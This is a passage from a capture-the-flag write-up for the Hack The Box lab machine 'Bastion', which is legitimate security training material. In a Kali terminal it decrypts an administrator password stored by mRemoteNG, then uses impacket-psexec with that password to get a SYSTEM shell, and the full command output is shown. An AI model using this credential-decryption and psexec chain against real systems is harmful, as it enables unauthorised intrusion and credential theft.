mRemoteNG Decryptor
I found this Python script that decrypts the encrypted credentials stored in mRemoteNG
┌──(kali㉿kali)-[~/archive/htb/labs/bastion]
└─$ python3 mRemoteNG_decryptor.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
password: thXLHM96BeKL0ER2Running the Python script with the -s flag to provide the encrypted base64 string just gives me the password
The decrypted password for the administrator user is thXLHM96BeKL0ER2
Privilege Escalation
┌──(kali㉿kali)-[~/archive/htb/labs/bastion]
└─$ impacket-psexec 'administrator:thXLHM96BeKL0ER2@bastion' -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.134.....
[*] Found writable share ADMIN$
[*] Uploading file KiABPSOp.exe
[*] Opening SVCManager on 10.10.10.134.....
[*] Creating service qJVQ on 10.10.10.134.....
[*] Starting service qJVQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
Bastion
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::201
IPv6 Address. . . . . . . . . . . : dead:beef::25e3:a1fe:1ad9:366b
Link-local IPv6 Address . . . . . : fe80::25e3:a1fe:1ad9:366b%4
IPv4 Address. . . . . . . . . . . : 10.10.10.134
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%4
10.10.10.2
Tunnel adapter isatap.{8253841C-588D-4E94-B23A-993BB2E4B4D9}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : htbSystem Level Compromise